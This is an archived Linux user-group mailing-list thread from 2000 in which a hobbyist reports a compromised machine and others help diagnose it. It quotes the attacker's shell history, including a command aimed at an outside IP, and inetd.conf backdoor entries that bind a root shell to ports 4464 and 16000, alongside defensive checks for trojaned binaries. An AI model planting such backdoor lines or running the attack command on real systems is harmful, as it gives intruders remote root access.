[TCLUG] Could Someone tell me what might be happening here.

Thu Dec 14 00:09:53 CST 2000

Yeah... you've been hacked.

Joseph Johnson wrote:
> 
> 
> 
> 
> 
> The traceroute to 212.38.131.178 reaches gw0-e1.index.com.jo
> (212.38.128.250)
> and then dies.  FYI: Country code ".jo" is Jordan.
> 
> What version of bind are you running?  Your code fragment below looks
> amazingly
> like a stealth IRC daemon/server installed via the ADMROCKS expliot on bind.
> 
> 1- Check /etc/inetd.conf to see if anything extra has been added
> This has been added
> Linuxconf stream tcp wait root /bin/linuxconf -http
> #swat stream tcp nowait.400 root /usr/sbin swat swat
> 4464 stream tcp nowait root /bin/sh sh -I
> 16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh
> 2- Run /usr/bin/lsattr against:
>           /usr/bin/dig
>           /usr/bin/dnsquery
>           /usr/bin/du
>           /usr/bin/find
>           /usr/bin/host
>           /usr/bin/nslookup
>           /usr/bin/top
>           /bin/ls
>           /bin/netstat
>           /bin/ps
>           /bin/login
> 
>    For each of those files, lsattr should output leading "--------"'s:
>           -------- /usr/bin/dig
>           -------- /usr/bin/dnsquery
>           -------- /usr/bin/du
>           -------- /usr/bin/find
>           -------- /usr/bin/host
>           -------- /usr/bin/nslookup
>           -------- /usr/bin/top
>           -------- /bin/ls
>           -------- /bin/netstat
>           -------- /bin/ps
>           -------- /bin/login
> everthing here looks like the above except for login which looks
> like ----i---/bin/login
> 
>    If it doesn't, you've been hacked.
> 
> 3- If you've been hacked, it's almost certain _other_ files have also been
>    installed, parts of your configuration (in /etc) have been tampered
>    with, and other nasty stuff has taken place.
> 
> If you've been hacked, about your only _secure_ option is to re-install from
> square-one (remembering to also add security updates provided by your Linux
> distributor).
> 
> To prevent a hacker reinfestation, if your Linux distribution contains an
> automatically configured firewall, install it.  If not, get one (I recommend
> PMFirewall for newbies, see http://www.pointman.org).
> 
> Hope this helps'idly,
> 
> -S
> 
> 
> 
> Joseph Johnson wrote:
> >
> >
> > I found this in my history file on a machine that I play around with when
> I
> > decide to try and learn Linux.
> >       (sleep 300 ; killall -9 uh)
> >       w
> >       ./uh 0 212.38.131.178 1 65535 /dev/null &
> >       I am pretty much a perpetual newbie. ( I do not do this for a
> living) I
> > know this systems been compromised. Short of reformatting the hard drive I
> > am not to sure what to do. Any help would be appreciated.
> > Joseph
> > josephj at mninter.net
> _______________________________________________
> tclug-list mailing list
> tclug-list at lists.real-time.com
> https://mailman.real-time.com/mailman/listinfo/tclug-list
> 
> _______________________________________________
> tclug-list mailing list
> tclug-list at lists.real-time.com
> https://mailman.real-time.com/mailman/listinfo/tclug-list
> 